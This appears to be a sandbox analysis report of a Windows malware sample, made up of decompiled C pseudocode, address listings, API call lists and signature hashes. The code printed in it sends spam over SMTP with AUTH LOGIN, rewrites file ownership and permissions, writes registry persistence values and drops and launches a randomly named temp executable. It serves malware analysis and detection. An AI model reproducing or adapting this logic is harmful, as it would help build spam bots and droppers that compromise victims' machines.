							_push(0x3f6);
							_t62 =  &_v1156;
							while(1) {
								_t63 =  *_t127(_a4, _t62);
								if(_t63 <= 0) {
									break;
								}
								_t103 = _t103 + _t63;
								if(_t103 > 0x1f4) {
									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
									_push(6);
									L72:
									_pop(_t65);
									return _t65;
								}
								 *((char*)(_t130 + _t103 - 0x480)) = 0;
								if(_v132 != 0) {
									L33:
									if(E0040EE95( &_v1156,  &_v132) != 0) {
										break;
									}
									L34:
									_push(0);
									_push(0x3f6 - _t103);
									_t62 = _t130 + _t103 - 0x480;
									continue;
								}
								if(_t103 <= 3) {
									goto L34;
								}
								E0040EE08( &_v132,  &_v1156, 4);
								_t131 = _t131 + 0xc;
								_v129 = 0x20;
								if(_v132 == 0) {
									goto L34;
								}
								goto L33;
							}
							_t123 = _a8;
							if(_t123 == 7) {
								L23:
								_push(2);
								goto L72;
							}
							if(_t103 <= 5) {
								E0040EF00(_a16, "Too small respons\n");
							} else {
								E0040EE08(_a16,  &_v1156, 0x76);
								_t131 = _t131 + 0xc;
								_a16[0x76] = 0;
							}
							if(_t103 < 5 ||  *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
								E0040EF00(_a16, "Incorrect respons");
								_push(7);
							} else {
								_t104 = E0040EDAC( &_v1156);
								if(_t104 == 0xdc || _t104 == 0xfa || _t104 == 0x162 || _t104 == 0xdd || _t104 == 0x14e || _t104 == 0xeb) {
									_t129 = 1;
									 *0x413668 = E0040EE95( &_v1156, "ESMTP") & 0xffffff00 | _t74 != 0x00000000;
									_t123 = 1;
								} else {
									_t129 = 0;
								}
								if(_t123 != 0xc || _t104 != 0x217) {
									if(_t129 != 0) {
										goto L23;
									}
									_t76 =  *0x413630;
									if( *0x413630 == 0 ||  *0x413634 == _t129 ||  *0x413638 == _t129) {
										L70:
										_push(0xb);
									} else {
										if(_t123 != 4 || E0040A699( &_v1156, _t76) == 0) {
											if(E0040A699( &_v1156,  *0x413634) == 0) {
												if(E0040A699( &_v1156,  *0x413638) == 0) {
													if(_t123 == 3 || _t123 == 4 || _t123 == 5 || _t123 == 6) {
														_t82 = E0040E819(1, "localcfg", "ip", E004030B5());
														_push( &_v132);
														if(E0040EE95( &_v1156, E0040A7A3(_t82, _t82)) != 0) {
															goto L62;
														}
													}
													goto L70;
												}
												_push(0xa);
												goto L72;
											}
											L62:
											_push(9);
										} else {
											_push(8);
										}
									}
								} else {
									_push(0xf);
								}
							}
							goto L72;
						}
						_t124 = 5;
						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
						if(_t96 == _t124) {
							goto L28;
						}
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
						return _t124;
					}
					if(_t102 != 7) {
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
						_push(5);
						goto L72;
					}
					goto L23;
				}
				switch( *((intOrPtr*)(_t59 * 4 +  &M0040AB51))) {
					case 0:
						goto L28;
					case 1:
						_push(_a12);
						_t100 =  &_v132;
						if( *0x413668 == 0) {
							_push("helo %s\r\n");
						} else {
							_push("ehlo %s\r\n");
						}
						goto L4;
					case 2:
						_push(_a12);
						_push("mail from:<%s>\r\n");
						goto L14;
					case 3:
						_push(_a12);
						_push("rcpt to:<%s>\r\n");
						L14:
						__eax =  &_v132;
						L4:
						wsprintfA(_t100, ??);
						goto L20;
					case 4:
						_push(7);
						_push("data\r\n");
						goto L19;
					case 5:
						goto L21;
					case 6:
						_push(7);
						_push("quit\r\n");
						goto L19;
					case 7:
						goto L21;
					case 8:
						_push(0xd);
						_push("AUTH LOGIN\r\n");
						L19:
						__eax =  &_v132;
						_push( &_v132);
						__eax = E0040EE08();
						goto L20;
					case 9:
						__eax = _a12;
						_t9 = __eax + 1; // 0x1
						__edx = _t9;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
						} while (__cl != 0);
						goto L9;
					case 0xa:
						__eax = _a12;
						_t15 = __eax + 1; // 0x1
						__edx = _t15;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
						} while (__cl != 0);
						L9:
						__eax = __eax - __edx;
						 *((char*)(__ebp + __eax - 0x80)) = 0;
						L20:
						_t131 = _t131 + 0xc;
						goto L21;
				}
			}


























                                                                                                                                  0x0040a7cb
                                                                                                                                  0x0040a7cf
                                                                                                                                  0x0040a7cf
                                                                                                                                  0x0040a7d3
                                                                                                                                  0x0040a7d9
                                                                                                                                  0x0040a87d
                                                                                                                                  0x0040a87e
                                                                                                                                  0x0040a886
                                                                                                                                  0x0040a88d
                                                                                                                                  0x0040a893
                                                                                                                                  0x0040a897
                                                                                                                                  0x0040a8c2
                                                                                                                                  0x0040a8f2
                                                                                                                                  0x0040a8f2
                                                                                                                                  0x0040a8f8
                                                                                                                                  0x0040a8fa
                                                                                                                                  0x0040a900
                                                                                                                                  0x0040a906
                                                                                                                                  0x0040a909
                                                                                                                                  0x0040a90a
                                                                                                                                  0x0040a978
                                                                                                                                  0x0040a97c
                                                                                                                                  0x0040a980
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a912
                                                                                                                                  0x0040a91a
                                                                                                                                  0x0040a9b9
                                                                                                                                  0x0040a9c2
                                                                                                                                  0x0040ab4a
                                                                                                                                  0x0040ab4a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ab4a
                                                                                                                                  0x0040a924
                                                                                                                                  0x0040a92c
                                                                                                                                  0x0040a954
                                                                                                                                  0x0040a968
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a96a
                                                                                                                                  0x0040a96e
                                                                                                                                  0x0040a970
                                                                                                                                  0x0040a971
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a971
                                                                                                                                  0x0040a931
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a940
                                                                                                                                  0x0040a945
                                                                                                                                  0x0040a94c
                                                                                                                                  0x0040a952
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a952
                                                                                                                                  0x0040a982
                                                                                                                                  0x0040a988
                                                                                                                                  0x0040a89e
                                                                                                                                  0x0040a89e
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a89e
                                                                                                                                  0x0040a991
                                                                                                                                  0x0040a9d1
                                                                                                                                  0x0040a993
                                                                                                                                  0x0040a99f
                                                                                                                                  0x0040a9a7
                                                                                                                                  0x0040a9aa
                                                                                                                                  0x0040a9aa
                                                                                                                                  0x0040a9db
                                                                                                                                  0x0040ab41
                                                                                                                                  0x0040ab48
                                                                                                                                  0x0040a9ef
                                                                                                                                  0x0040a9fb
                                                                                                                                  0x0040aa04
                                                                                                                                  0x0040aa40
                                                                                                                                  0x0040aa4d
                                                                                                                                  0x0040aa52
                                                                                                                                  0x0040aa2e
                                                                                                                                  0x0040aa2e
                                                                                                                                  0x0040aa2e
                                                                                                                                  0x0040aa57
                                                                                                                                  0x0040aa6a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aa70
                                                                                                                                  0x0040aa77
                                                                                                                                  0x0040ab35
                                                                                                                                  0x0040ab35
                                                                                                                                  0x0040aa95
                                                                                                                                  0x0040aa98
                                                                                                                                  0x0040aaca
                                                                                                                                  0x0040aae6
                                                                                                                                  0x0040aaef
                                                                                                                                  0x0040ab12
                                                                                                                                  0x0040ab1a
                                                                                                                                  0x0040ab33
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ab33
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aaef
                                                                                                                                  0x0040aae8
                                                                                                                                  0x00000000
                                                                                                                                  0x0040aae8
                                                                                                                                  0x0040aacc
                                                                                                                                  0x0040aacc
                                                                                                                                  0x0040aaad
                                                                                                                                  0x0040aaad
                                                                                                                                  0x0040aaad
                                                                                                                                  0x0040aa98
                                                                                                                                  0x0040aa61
                                                                                                                                  0x0040aa61
                                                                                                                                  0x0040aa61
                                                                                                                                  0x0040aa57
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a9db
                                                                                                                                  0x0040a8c8
                                                                                                                                  0x0040a8d2
                                                                                                                                  0x0040a8d6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a8e2
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a8eb
                                                                                                                                  0x0040a89c
                                                                                                                                  0x0040a8af
                                                                                                                                  0x0040a8b8
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a8b8
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a89c
                                                                                                                                  0x0040a7df
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a7ed
                                                                                                                                  0x0040a7f0
                                                                                                                                  0x0040a7f3
                                                                                                                                  0x0040a803
                                                                                                                                  0x0040a7f5
                                                                                                                                  0x0040a7f5
                                                                                                                                  0x0040a7f5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a845
                                                                                                                                  0x0040a848
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a852
                                                                                                                                  0x0040a855
                                                                                                                                  0x0040a84d
                                                                                                                                  0x0040a84d
                                                                                                                                  0x0040a7fa
                                                                                                                                  0x0040a7fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a85c
                                                                                                                                  0x0040a85e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a86a
                                                                                                                                  0x0040a86c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a80a
                                                                                                                                  0x0040a80c
                                                                                                                                  0x0040a871
                                                                                                                                  0x0040a871
                                                                                                                                  0x0040a874
                                                                                                                                  0x0040a875
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a813
                                                                                                                                  0x0040a816
                                                                                                                                  0x0040a816
                                                                                                                                  0x0040a819
                                                                                                                                  0x0040a819
                                                                                                                                  0x0040a81b
                                                                                                                                  0x0040a81c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a836
                                                                                                                                  0x0040a839
                                                                                                                                  0x0040a839
                                                                                                                                  0x0040a83c
                                                                                                                                  0x0040a83c
                                                                                                                                  0x0040a83e
                                                                                                                                  0x0040a83f
                                                                                                                                  0x0040a820
                                                                                                                                  0x0040a824
                                                                                                                                  0x0040a82f
                                                                                                                                  0x0040a87a
                                                                                                                                  0x0040a87a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • wsprintfA.USER32 ref: 0040A7FB
                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
                                                                                                                                  • send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
                                                                                                                                  • wsprintfA.USER32 ref: 0040A8AF
                                                                                                                                  • send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
                                                                                                                                  • wsprintfA.USER32 ref: 0040A8E2
                                                                                                                                  • recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
                                                                                                                                  • wsprintfA.USER32 ref: 0040A9B9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$send$lstrlenrecv
                                                                                                                                  • String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                                                                  • API String ID: 3650048968-2394369944
                                                                                                                                  • Opcode ID: c6cb36aca3368d580b4f06862e298dacd866bb1fbaab33c91d69e95154328597
                                                                                                                                  • Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
                                                                                                                                  • Opcode Fuzzy Hash: c6cb36aca3368d580b4f06862e298dacd866bb1fbaab33c91d69e95154328597
                                                                                                                                  • Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD7A70 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 00AD7A96
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00AD7ACD
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00AD7ADF
                                                                                                                                  • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 00AD7B01
                                                                                                                                  • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 00AD7B1F
                                                                                                                                  • EqualSid.ADVAPI32(?,?), ref: 00AD7B39
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 00AD7B4A
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00AD7B58
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00AD7B68
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00AD7B77
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00AD7B7E
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD7B9A
                                                                                                                                  • GetAce.ADVAPI32(?,?,?), ref: 00AD7BCA
                                                                                                                                  • EqualSid.ADVAPI32(?,?), ref: 00AD7BF1
                                                                                                                                  • DeleteAce.ADVAPI32(?,?), ref: 00AD7C0A
                                                                                                                                  • EqualSid.ADVAPI32(?,?), ref: 00AD7C2C
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 00AD7CB1
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00AD7CBF
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00AD7CD0
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00AD7CE0
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00AD7CEE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 3722657555-2746444292
                                                                                                                                  • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                                                                  • Instruction ID: 8a7859828e80ea6ee7d19c3a3d98ff1f2f61c0dd3d50b42d3c25c0161a6b7a5f
                                                                                                                                  • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                                                                  • Instruction Fuzzy Hash: 74815D71D04219AFDB25CFA4DD84FEEBBB8FF08304F04806AE506E6250E7759A45CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00408328 Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 361registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E00408328(char* __ecx, char __edx) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				struct _PROCESS_INFORMATION _v44;
				char _v60;
				struct _STARTUPINFOA _v128;
				char _v388;
				char _v427;
				char _v428;
				char _t88;
				char _t89;
				void* _t91;
				char _t93;
				int _t102;
				char _t107;
				intOrPtr _t113;
				char _t116;
				void* _t117;
				signed int _t122;
				char _t126;
				void* _t128;
				char* _t130;
				char _t131;
				char* _t133;
				char _t134;
				char* _t137;
				int _t139;
				char _t144;
				char _t146;
				char* _t147;
				char _t149;
				char _t153;
				intOrPtr* _t154;
				char* _t156;
				char* _t159;
				char _t160;
				char _t165;
				void* _t174;
				signed int _t177;
				char _t180;
				char* _t188;
				int _t189;
				long _t193;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				_t181 = __edx;
				_t173 = __ecx;
				_v16 = 0;
				if(E00407DD6(__edx) != 0) {
					return 1;
				}
				_t88 = E00406EC3();
				__eflags = _t88;
				if(_t88 != 0) {
					_v8 = 0;
					__eflags =  *0x412c3c; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					__eflags =  *0x412c38; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					_t130 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
					_t198 = _t196 + 0x14;
					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
					__eflags = _t131;
					if(_t131 != 0) {
						L31:
						_t133 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t198 = _t198 + 0x14;
						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
						__eflags = _t134;
						if(_t134 != 0) {
							L35:
							E0040EE2A(_t173, 0x4122f8, 0, 0x100);
							_t196 = _t198 + 0xc;
							__eflags = _v8;
							if(_v8 != 0) {
								E0040EC2E(_v8);
							}
							goto L37;
						}
						_t188 =  *0x412c3c; // 0x0
						_t137 = _t188;
						_t44 =  &(_t137[1]); // 0x1
						_t173 = _t44;
						do {
							_t181 =  *_t137;
							_t137 =  &(_t137[1]);
							__eflags = _t181;
						} while (_t181 != 0);
						_t139 = _t137 - _t173 + 1;
						__eflags = _t139;
						RegSetValueExA(_v12,  *0x412c38, 0, 1, _t188, _t139);
						RegCloseKey(_v12);
						goto L35;
					}
					_t144 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, 0,  &_v16);
					__eflags = _t144;
					if(_t144 == 0) {
						__eflags = _v28 - 1;
						if(_v28 == 1) {
							__eflags = _v16;
							if(_v16 > 0) {
								_t147 = E0040EBCC(_v16);
								_pop(_t173);
								_v8 = _t147;
								__eflags = _t147;
								if(_t147 != 0) {
									_t173 =  &_v16;
									_t149 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, _t147,  &_v16);
									__eflags = _t149;
									if(_t149 != 0) {
										E0040EC2E(_v8);
										_pop(_t173);
										_v8 = 0;
									}
								}
							}
						}
					}
					RegCloseKey(_v12);
					__eflags = _v8;
					if(_v8 != 0) {
						_t146 = E0040EED1(_v8,  *0x412c3c);
						_pop(_t173);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L35;
						}
					}
					goto L31;
				} else {
					_t153 = E004073FF(_t173, 0x410264, 0, 0,  &_v388,  &_v60);
					_t199 = _t196 + 0x14;
					__eflags = _t153;
					if(_t153 <= 0) {
						L19:
						_t91 = 0;
						L56:
						return _t91;
					}
					__eflags = _v388;
					if(_v388 == 0) {
						goto L19;
					}
					__eflags = _v60;
					if(_v60 == 0) {
						goto L19;
					} else {
						_t154 =  &_v388;
						_t181 = _t154 + 1;
						do {
							_t180 =  *_t154;
							_t154 = _t154 + 1;
							__eflags = _t180;
						} while (_t180 != 0);
						_t156 = _t195 + _t154 - _t181 - 0x181;
						__eflags =  *_t156 - 0x5c;
						if( *_t156 == 0x5c) {
							 *_t156 = 0;
						}
						__eflags =  *0x412159 - 0x60;
						if( *0x412159 < 0x60) {
							L18:
							E0040EE2A(_t180, 0x4122f8, 0, 0x100);
							_t196 = _t199 + 0xc;
							L37:
							_v20 = 0;
							_v8 = 0;
							__eflags =  *0x4121a8; // 0x0
							if(__eflags == 0) {
								L42:
								__eflags =  *0x412cd8; // 0x0
								if(__eflags != 0) {
									L46:
									_t89 = E00406BA7(0x412cd8);
									_pop(_t174);
									__eflags = _t89;
									if(_t89 == 0) {
										L52:
										 *0x412cd8 = 0;
										L53:
										__eflags = _v8;
										if(_v8 != 0) {
											E0040EC2E(_v8);
										}
										_t91 = 1;
										__eflags = 1;
										goto L56;
									}
									_t93 = E00407E2F(_t181);
									__eflags = _t93;
									if(_t93 != 0) {
										L51:
										DeleteFileA(0x412cd8);
										goto L52;
									}
									_t193 = 0x44;
									E0040EE2A(_t174,  &_v128, 0, _t193);
									_v128.cb = _t193;
									E0040EE2A(_t174,  &_v44, 0, 0x10);
									_v428 = 0x22;
									lstrcpyA( &_v427, 0x412cd8);
									_t102 = lstrlenA( &_v428);
									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
									E00407FCF(_t174);
									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
									__eflags = _t107;
									if(_t107 == 0) {
										E00407EE6(_t174);
										E00407EAD(_t181, __eflags, 0);
										goto L51;
									}
									CloseHandle(_v44.hThread);
									CloseHandle(_v44);
									goto L53;
								}
								GetTempPathA(0x12c, 0x412cd8);
								_t113 = E00408274(0x412cd8);
								_pop(_t177);
								_v24 = _t113;
								_t116 = (E0040ECA5() & 0x00000003) + 5;
								_v20 = _t116;
								__eflags = _t116;
								if(_t116 <= 0) {
									L45:
									_t117 = E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8);
									_t69 = _v24 + 0x412cd8; // 0x0
									E0040EF00(_t69, _t117);
									E0040EE2A(_t177, 0x4122f8, 0, 0x100);
									_t196 = _t196 + 0x28;
									goto L46;
								} else {
									goto L44;
								}
								do {
									L44:
									_t122 = E0040ECA5();
									_t177 = 0x1a;
									_t181 = _t122 % _t177 + 0x61;
									_v24 = _v24 + 1;
									_v20 = _v20 - 1;
									 *((char*)(_v24 + 0x412cd8)) = _t122 % _t177 + 0x61;
									__eflags = _v20;
								} while (_v20 > 0);
								goto L45;
							}
							_t126 = E0040675C(0x4121a8,  &_v20, 0);
							_t196 = _t196 + 0xc;
							_v8 = _t126;
							__eflags =  *0x4121a8; // 0x0
							if(__eflags == 0) {
								goto L42;
							}
							__eflags = _t126;
							if(_t126 == 0) {
								goto L42;
							}
							__eflags = _v20 -  *0x4121a4; // 0x0
							if(__eflags != 0) {
								goto L42;
							}
							_t128 = E004024C2(_v8, _t127, 0);
							_t196 = _t196 + 0xc;
							__eflags =  *0x4122d4 - _t128; // 0x0
							if(__eflags == 0) {
								goto L53;
							}
							goto L42;
						}
						_t189 = 4;
						_v8 = 0;
						_v16 = _t189;
						_t159 = E00402544(0x4122f8,  &E00410710, 0x35, 0xe4, 0xc8);
						_t199 = _t199 + 0x14;
						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12);
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						}
						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16);
						__eflags = _t165;
						if(_t165 != 0) {
							L16:
							_v8 = 0;
							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189);
							L17:
							RegCloseKey(_v12);
							goto L18;
						}
						__eflags = _v28 - _t189;
						if(_v28 != _t189) {
							goto L16;
						}
						__eflags = _v16 - _t189;
						if(_v16 != _t189) {
							goto L16;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						goto L16;
					}
				}
			}





















































                                                                                                                                  0x00408328
                                                                                                                                  0x00408328
                                                                                                                                  0x00408334
                                                                                                                                  0x0040833e
                                                                                                                                  0x00000000
                                                                                                                                  0x00408342
                                                                                                                                  0x0040834a
                                                                                                                                  0x00408354
                                                                                                                                  0x00408356
                                                                                                                                  0x0040846b
                                                                                                                                  0x0040846e
                                                                                                                                  0x00408474
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040847a
                                                                                                                                  0x00408480
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004084a2
                                                                                                                                  0x004084ad
                                                                                                                                  0x004084b6
                                                                                                                                  0x004084b8
                                                                                                                                  0x004084ba
                                                                                                                                  0x00408543
                                                                                                                                  0x0040855f
                                                                                                                                  0x00408564
                                                                                                                                  0x0040856d
                                                                                                                                  0x0040856f
                                                                                                                                  0x00408571
                                                                                                                                  0x004085a5
                                                                                                                                  0x004085ac
                                                                                                                                  0x004085b1
                                                                                                                                  0x004085b4
                                                                                                                                  0x004085b7
                                                                                                                                  0x004085bc
                                                                                                                                  0x004085c1
                                                                                                                                  0x00000000
                                                                                                                                  0x004085b7
                                                                                                                                  0x00408573
                                                                                                                                  0x00408579
                                                                                                                                  0x0040857b
                                                                                                                                  0x0040857b
                                                                                                                                  0x0040857e
                                                                                                                                  0x0040857e
                                                                                                                                  0x00408580
                                                                                                                                  0x00408581
                                                                                                                                  0x00408581
                                                                                                                                  0x00408587
                                                                                                                                  0x00408587
                                                                                                                                  0x00408596
                                                                                                                                  0x0040859f
                                                                                                                                  0x00000000
                                                                                                                                  0x0040859f
                                                                                                                                  0x004084d3
                                                                                                                                  0x004084d9
                                                                                                                                  0x004084db
                                                                                                                                  0x004084dd
                                                                                                                                  0x004084e1
                                                                                                                                  0x004084e3
                                                                                                                                  0x004084e6
                                                                                                                                  0x004084eb
                                                                                                                                  0x004084f0
                                                                                                                                  0x004084f1
                                                                                                                                  0x004084f4
                                                                                                                                  0x004084f6
                                                                                                                                  0x004084f8
                                                                                                                                  0x0040850b
                                                                                                                                  0x00408511
                                                                                                                                  0x00408513
                                                                                                                                  0x00408518
                                                                                                                                  0x0040851d
                                                                                                                                  0x0040851e
                                                                                                                                  0x0040851e
                                                                                                                                  0x00408513
                                                                                                                                  0x004084f6
                                                                                                                                  0x004084e6
                                                                                                                                  0x004084e1
                                                                                                                                  0x00408524
                                                                                                                                  0x0040852a
                                                                                                                                  0x0040852d
                                                                                                                                  0x00408538
                                                                                                                                  0x0040853e
                                                                                                                                  0x0040853f
                                                                                                                                  0x00408541
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408541
                                                                                                                                  0x00000000
                                                                                                                                  0x0040835c
                                                                                                                                  0x0040836e
                                                                                                                                  0x00408373
                                                                                                                                  0x00408376
                                                                                                                                  0x00408378
                                                                                                                                  0x00408464
                                                                                                                                  0x00408464
                                                                                                                                  0x00408779
                                                                                                                                  0x00000000
                                                                                                                                  0x0040877a
                                                                                                                                  0x0040837e
                                                                                                                                  0x00408384
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040838a
                                                                                                                                  0x0040838d
                                                                                                                                  0x00000000
                                                                                                                                  0x00408393
                                                                                                                                  0x00408393
                                                                                                                                  0x00408399
                                                                                                                                  0x0040839c
                                                                                                                                  0x0040839c
                                                                                                                                  0x0040839e
                                                                                                                                  0x0040839f
                                                                                                                                  0x0040839f
                                                                                                                                  0x004083a5
                                                                                                                                  0x004083ac
                                                                                                                                  0x004083af
                                                                                                                                  0x004083b1
                                                                                                                                  0x004083b1
                                                                                                                                  0x004083b3
                                                                                                                                  0x004083ba
                                                                                                                                  0x00408450
                                                                                                                                  0x00408457
                                                                                                                                  0x0040845c
                                                                                                                                  0x004085c2
                                                                                                                                  0x004085c2
                                                                                                                                  0x004085c5
                                                                                                                                  0x004085c8
                                                                                                                                  0x004085ce
                                                                                                                                  0x00408615
                                                                                                                                  0x0040861a
                                                                                                                                  0x00408620
                                                                                                                                  0x004086a7
                                                                                                                                  0x004086a8
                                                                                                                                  0x004086ad
                                                                                                                                  0x004086ae
                                                                                                                                  0x004086b0
                                                                                                                                  0x00408762
                                                                                                                                  0x00408762
                                                                                                                                  0x00408768
                                                                                                                                  0x00408768
                                                                                                                                  0x0040876b
                                                                                                                                  0x00408770
                                                                                                                                  0x00408775
                                                                                                                                  0x00408778
                                                                                                                                  0x00408778
                                                                                                                                  0x00000000
                                                                                                                                  0x00408778
                                                                                                                                  0x004086b6
                                                                                                                                  0x004086bb
                                                                                                                                  0x004086bd
                                                                                                                                  0x0040875b
                                                                                                                                  0x0040875c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040875c
                                                                                                                                  0x004086c5
                                                                                                                                  0x004086cc
                                                                                                                                  0x004086d8
                                                                                                                                  0x004086db
                                                                                                                                  0x004086eb
                                                                                                                                  0x004086f2
                                                                                                                                  0x004086ff
                                                                                                                                  0x00408705
                                                                                                                                  0x0040870d
                                                                                                                                  0x00408714
                                                                                                                                  0x00408733
                                                                                                                                  0x00408739
                                                                                                                                  0x0040873b
                                                                                                                                  0x0040874f
                                                                                                                                  0x00408755
                                                                                                                                  0x00000000
                                                                                                                                  0x0040875a
                                                                                                                                  0x00408746
                                                                                                                                  0x0040874b
                                                                                                                                  0x00000000
